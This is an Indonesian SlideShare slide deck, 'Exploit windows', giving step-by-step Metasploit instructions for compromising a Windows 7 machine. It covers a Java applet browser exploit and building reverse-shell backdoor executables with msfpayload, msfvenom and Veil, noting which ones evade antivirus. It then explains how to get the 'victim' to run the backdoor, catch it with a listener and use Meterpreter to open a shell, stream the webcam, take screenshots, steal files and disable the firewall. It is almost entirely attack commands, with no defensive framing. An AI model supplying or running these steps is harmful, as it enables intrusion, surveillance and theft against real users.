SlideShare a Scribd company logo
1 of 12
Download to read offline
ZAENAL ABIDIN
Exploit windows
Sebelum melulai exploit
Jalankan service metasploit
- Applications => Kali Linux => System services => Metasploit => Comunity / pro start
Untuk menjalankan Metasploit freamwork
- Applications => Kali linux => Exploitation tools => Metasploit => Metasploit freamwork
Menjalankan metasploit melalui terminal
- bukan terminal ketik msfconsole
Exploit windows mengunakan java applet
- ketik: use exploit/multi/browser/java_jre17_provider_skeleton
Tekan enter
- ketik: set payload java/Meterpreter/reverse_tcp
Tekan enter
- ketik: set lhost (ketik ip komputer yang kamu gunakan)
Tekan enter
- ketik: set srvhost (ketik ip kamputer yang kamu gunakan)
ZAENAL ABIDIN
Tekan enter
- ketik: set uripath /
Tekan enter
- exploit tekan enter
Di komputer korban buka browser dan ketik alamat website: http://172.16.204.1:8080/
Alamat website di dapat dari: USING URL: http://172.16.204.1:8080/
Sudah berhasil masuk ke os windows7
Exploit windows menggunakan Backdoor
Banyak cara untuk membuat backdoor
Bisa menggunakan setoolkit, msfpayload, msfvenom, veil dll.
ZAENAL ABIDIN
Menggunakan msfpayload
- buka terminal kemudian ketik kode di bawah ini: msfpayload
windows/meterpreter/reverse_tcp lhost=172.16.204.1 lport=4444 x >
/root/JanganDibuka.exe
Ket:
Lhost = ip komputer yang kamu gunakan
Lport = isi dengan port 4444
/root = letak backdoor yang sudah jadi
JanganDibuka = filenema backdoor yang akan di buat
Menggunakan msfvenom
- buka teminal ketik kode di bawah ini:
msfvenom -p windows/meterpreter/reverse_tcp
- o
Ketik di bawah ini untuk membuat backdoor
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b 'x00'
lhost=172.16.204.1 lport=4444 -f exe>/root/JanganDibuka.exe
Menggunakan veil
Sebelum menggunakan veil
ZAENAL ABIDIN
Install dulu tool veil
- buka terminal ketik wget https://github.com/ChrisTruncer/Veil/archive/master.zip
- Kemudian extrak menggunakan perintah unzip master.zip
- install veil: /root/Veil-Evasion-master/setup/setup.sh
Membuat backdoor
- masuk terminal kerik /root/Veil-Evasion-master/Veil-Evasion.py
- ketik use
Ketik 25
ZAENAL ABIDIN
Ketik generate
Ketik 1
Tekan enter
ketik ip komputer yang kamu gunakan
Ketik port 4444
ZAENAL ABIDIN
Tekan enter
Ketik nama backdoor yang akan dibuat
Ketik 1
Letak backdoor yang suka jadi di : /root/veil-output/compiled/JanganDibuka.exe
Di atas sudah ada beberapa contoh membuat backdoor
Kalau menggunakan backdoor :
- msfpayload = mudah terdeteksi antivirus
ZAENAL ABIDIN
- msfvenom = bisa lolos dari antivirus
- veil = bisa lolos dari antivirus
Menggunakan Backdoor
- buka terminal ketik:
Msfconsole
Ketik : use exploit/multi/handler
Tekan enter
Ketik : set payload windows/meterpreter/reverse_tcp
Tekan enter
Ketik : set lhost (ip komputer yang kamu gunakan)
Tekan enter
Ketik : set lport (port nya samakan dengan port backdoor yang kamu telah buat)
Tekan enter
Ketik : exploit
Tekan enter
Copy dan jalankan backdoor di komputer korban
ZAENAL ABIDIN
Ketik help : mengetahui perintah meterpreter
Berhasil masuk ke windows7
ZAENAL ABIDIN
ZAENAL ABIDIN
Ketik shell untuk masuk cmd windows7
Ketik exit : keluar dari cmd
Ketik screenshot : sreenshot windows7
Ketik webcam_stream : menjalankan webcam komputer korban
ZAENAL ABIDIN
Ketik run vnc : remote komputer korban
Untuk mengambil file dari komputer korban
Ketik download  lokasi file korban
Contoh: download c:wallpaper.jpg
ZAENAL ABIDIN
Untuk menaruh file ke komputer korban
Ketik upload  file yang akan ditaruh di komputer korban
Contoh: upload gambar.jpg c:
Untuk disable firewall windows
Ketik: netsh firewall set opmode disable

More Related Content

What's hot (7)

Tutorial membuat server pada VMWare dengan OS Debian 6
Tutorial membuat server pada VMWare dengan OS Debian 6Tutorial membuat server pada VMWare dengan OS Debian 6
Tutorial membuat server pada VMWare dengan OS Debian 6
 
Firewall
FirewallFirewall
Firewall
 
tutorial snort and nessus
tutorial snort and nessustutorial snort and nessus
tutorial snort and nessus
 
Belajar bikin vps dengan centos
Belajar bikin vps dengan centosBelajar bikin vps dengan centos
Belajar bikin vps dengan centos
 
Tutorial Instalasi Senayan di Jaringan Intranet
Tutorial Instalasi Senayan di Jaringan IntranetTutorial Instalasi Senayan di Jaringan Intranet
Tutorial Instalasi Senayan di Jaringan Intranet
 
Repository lokal zorin linux
Repository lokal zorin linuxRepository lokal zorin linux
Repository lokal zorin linux
 
APLIKASI
APLIKASIAPLIKASI
APLIKASI
 

Similar to Exploit windows

Cara instalasi aplikasi_perpustakaan_dig
Cara instalasi aplikasi_perpustakaan_digCara instalasi aplikasi_perpustakaan_dig
Cara instalasi aplikasi_perpustakaan_dig
iwannazhan
 
Cara menghack warnet yang di protect
Cara menghack warnet yang di protectCara menghack warnet yang di protect
Cara menghack warnet yang di protect
Rachel Darussalam
 
Memblokir situs dengan squid proxy di linux debian server By: Fakhri akbar CC5
Memblokir situs dengan squid proxy di linux debian server By: Fakhri akbar CC5Memblokir situs dengan squid proxy di linux debian server By: Fakhri akbar CC5
Memblokir situs dengan squid proxy di linux debian server By: Fakhri akbar CC5
akbarfak
 
Celah keamanan komputer (arp spoofing)
Celah keamanan komputer (arp spoofing)Celah keamanan komputer (arp spoofing)
Celah keamanan komputer (arp spoofing)
steelhearts
 
Memasang aplikasi phpindonesia_di_windows_7
Memasang aplikasi phpindonesia_di_windows_7Memasang aplikasi phpindonesia_di_windows_7
Memasang aplikasi phpindonesia_di_windows_7
Cahya Dwiana SN
 
Instalasi mikrotik-router os
Instalasi mikrotik-router osInstalasi mikrotik-router os
Instalasi mikrotik-router os
cabikhosting
 
Konfigurasi wireles pada debian
Konfigurasi wireles pada debianKonfigurasi wireles pada debian
Konfigurasi wireles pada debian
anlehmooneyham
 

Similar to Exploit windows (20)

Jurnal metasploit(revisi)
Jurnal metasploit(revisi)Jurnal metasploit(revisi)
Jurnal metasploit(revisi)
 
Cara instalasi aplikasi_perpustakaan_dig
Cara instalasi aplikasi_perpustakaan_digCara instalasi aplikasi_perpustakaan_dig
Cara instalasi aplikasi_perpustakaan_dig
 
Cara instalasi aplikasi perpustakaan digital eprints
Cara instalasi aplikasi perpustakaan digital eprintsCara instalasi aplikasi perpustakaan digital eprints
Cara instalasi aplikasi perpustakaan digital eprints
 
Administrasi dasar depdiknux
Administrasi dasar depdiknuxAdministrasi dasar depdiknux
Administrasi dasar depdiknux
 
Cara menghack warnet yang di protect
Cara menghack warnet yang di protectCara menghack warnet yang di protect
Cara menghack warnet yang di protect
 
Bahaya virus net
Bahaya virus netBahaya virus net
Bahaya virus net
 
Korry marintan siahaan, hapzi ali,forum 7 keamanan sistem informasi, ut, 2018
Korry marintan siahaan, hapzi ali,forum 7 keamanan sistem informasi, ut, 2018Korry marintan siahaan, hapzi ali,forum 7 keamanan sistem informasi, ut, 2018
Korry marintan siahaan, hapzi ali,forum 7 keamanan sistem informasi, ut, 2018
 
Memblokir situs dengan squid proxy di linux debian server By: Fakhri akbar CC5
Memblokir situs dengan squid proxy di linux debian server By: Fakhri akbar CC5Memblokir situs dengan squid proxy di linux debian server By: Fakhri akbar CC5
Memblokir situs dengan squid proxy di linux debian server By: Fakhri akbar CC5
 
Cara install-server-centos
Cara install-server-centosCara install-server-centos
Cara install-server-centos
 
Streaming server di linux debian
Streaming server di linux debianStreaming server di linux debian
Streaming server di linux debian
 
Modul Pembelajaran Mikrotik
Modul Pembelajaran MikrotikModul Pembelajaran Mikrotik
Modul Pembelajaran Mikrotik
 
Celah keamanan komputer (arp spoofing)
Celah keamanan komputer (arp spoofing)Celah keamanan komputer (arp spoofing)
Celah keamanan komputer (arp spoofing)
 
Basic Metasploit
Basic MetasploitBasic Metasploit
Basic Metasploit
 
Memasang aplikasi phpindonesia_di_windows_7
Memasang aplikasi phpindonesia_di_windows_7Memasang aplikasi phpindonesia_di_windows_7
Memasang aplikasi phpindonesia_di_windows_7
 
Membangun Cloud Computing Berbasis F/OSS
Membangun Cloud Computing Berbasis F/OSSMembangun Cloud Computing Berbasis F/OSS
Membangun Cloud Computing Berbasis F/OSS
 
Trik komputer
Trik komputerTrik komputer
Trik komputer
 
Installasi xampp
Installasi xamppInstallasi xampp
Installasi xampp
 
Instalasi mikrotik-router os
Instalasi mikrotik-router osInstalasi mikrotik-router os
Instalasi mikrotik-router os
 
Aplikasi Linux Ubuntu (Ubuntu Aplication)
Aplikasi Linux Ubuntu (Ubuntu Aplication)Aplikasi Linux Ubuntu (Ubuntu Aplication)
Aplikasi Linux Ubuntu (Ubuntu Aplication)
 
Konfigurasi wireles pada debian
Konfigurasi wireles pada debianKonfigurasi wireles pada debian
Konfigurasi wireles pada debian
 

Exploit windows

  • 1. ZAENAL ABIDIN Exploit windows Sebelum melulai exploit Jalankan service metasploit - Applications => Kali Linux => System services => Metasploit => Comunity / pro start Untuk menjalankan Metasploit freamwork - Applications => Kali linux => Exploitation tools => Metasploit => Metasploit freamwork Menjalankan metasploit melalui terminal - bukan terminal ketik msfconsole Exploit windows mengunakan java applet - ketik: use exploit/multi/browser/java_jre17_provider_skeleton Tekan enter - ketik: set payload java/Meterpreter/reverse_tcp Tekan enter - ketik: set lhost (ketik ip komputer yang kamu gunakan) Tekan enter - ketik: set srvhost (ketik ip kamputer yang kamu gunakan)
  • 2. ZAENAL ABIDIN Tekan enter - ketik: set uripath / Tekan enter - exploit tekan enter Di komputer korban buka browser dan ketik alamat website: http://172.16.204.1:8080/ Alamat website di dapat dari: USING URL: http://172.16.204.1:8080/ Sudah berhasil masuk ke os windows7 Exploit windows menggunakan Backdoor Banyak cara untuk membuat backdoor Bisa menggunakan setoolkit, msfpayload, msfvenom, veil dll.
  • 3. ZAENAL ABIDIN Menggunakan msfpayload - buka terminal kemudian ketik kode di bawah ini: msfpayload windows/meterpreter/reverse_tcp lhost=172.16.204.1 lport=4444 x > /root/JanganDibuka.exe Ket: Lhost = ip komputer yang kamu gunakan Lport = isi dengan port 4444 /root = letak backdoor yang sudah jadi JanganDibuka = filenema backdoor yang akan di buat Menggunakan msfvenom - buka teminal ketik kode di bawah ini: msfvenom -p windows/meterpreter/reverse_tcp - o Ketik di bawah ini untuk membuat backdoor msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b 'x00' lhost=172.16.204.1 lport=4444 -f exe>/root/JanganDibuka.exe Menggunakan veil Sebelum menggunakan veil
  • 4. ZAENAL ABIDIN Install dulu tool veil - buka terminal ketik wget https://github.com/ChrisTruncer/Veil/archive/master.zip - Kemudian extrak menggunakan perintah unzip master.zip - install veil: /root/Veil-Evasion-master/setup/setup.sh Membuat backdoor - masuk terminal kerik /root/Veil-Evasion-master/Veil-Evasion.py - ketik use Ketik 25
  • 5. ZAENAL ABIDIN Ketik generate Ketik 1 Tekan enter ketik ip komputer yang kamu gunakan Ketik port 4444
  • 6. ZAENAL ABIDIN Tekan enter Ketik nama backdoor yang akan dibuat Ketik 1 Letak backdoor yang suka jadi di : /root/veil-output/compiled/JanganDibuka.exe Di atas sudah ada beberapa contoh membuat backdoor Kalau menggunakan backdoor : - msfpayload = mudah terdeteksi antivirus
  • 7. ZAENAL ABIDIN - msfvenom = bisa lolos dari antivirus - veil = bisa lolos dari antivirus Menggunakan Backdoor - buka terminal ketik: Msfconsole Ketik : use exploit/multi/handler Tekan enter Ketik : set payload windows/meterpreter/reverse_tcp Tekan enter Ketik : set lhost (ip komputer yang kamu gunakan) Tekan enter Ketik : set lport (port nya samakan dengan port backdoor yang kamu telah buat) Tekan enter Ketik : exploit Tekan enter Copy dan jalankan backdoor di komputer korban
  • 8. ZAENAL ABIDIN Ketik help : mengetahui perintah meterpreter Berhasil masuk ke windows7
  • 10. ZAENAL ABIDIN Ketik shell untuk masuk cmd windows7 Ketik exit : keluar dari cmd Ketik screenshot : sreenshot windows7 Ketik webcam_stream : menjalankan webcam komputer korban
  • 11. ZAENAL ABIDIN Ketik run vnc : remote komputer korban Untuk mengambil file dari komputer korban Ketik download lokasi file korban Contoh: download c:wallpaper.jpg
  • 12. ZAENAL ABIDIN Untuk menaruh file ke komputer korban Ketik upload file yang akan ditaruh di komputer korban Contoh: upload gambar.jpg c: Untuk disable firewall windows Ketik: netsh firewall set opmode disable